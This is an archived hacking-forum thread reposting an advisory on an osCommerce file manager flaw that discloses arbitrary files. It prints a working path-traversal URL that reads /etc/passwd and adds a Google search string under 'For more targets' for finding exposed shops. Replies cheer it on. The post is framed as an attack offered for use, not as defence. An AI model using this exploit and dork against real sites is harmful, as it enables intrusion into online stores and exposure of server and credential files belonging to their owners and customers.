hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

Full Version: Oscommerce
RELiC
QUOTE
osCommerce's File Manager Arbitrary File Disclosure

Summary
"osCommerce is an online shop e-commerce solution under on going development by the open source community. Its feature packed out-of-the-box installation allows store owners to setup, run, and maintain their online stores with minimum effort and with absolutely no costs or license fees involved". A vulnerability in the product allows a remote attacker to access files that reside outside the bound HTML root directory.

Details
Normally osCommerce will allows you to view only osCommerce's directories, however, if you type in the following you can view any file on the server with the web server's permissions:
CODE
http://www.vulnerable/oscommerce/file_manager.php?action=download&filename=../../../../../../../../etc/passwd

For more targets
Google:allinurl:admin/file_manager.php
Source:securityfocus.com

../
../
F34R
lol... nice... biggrin.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.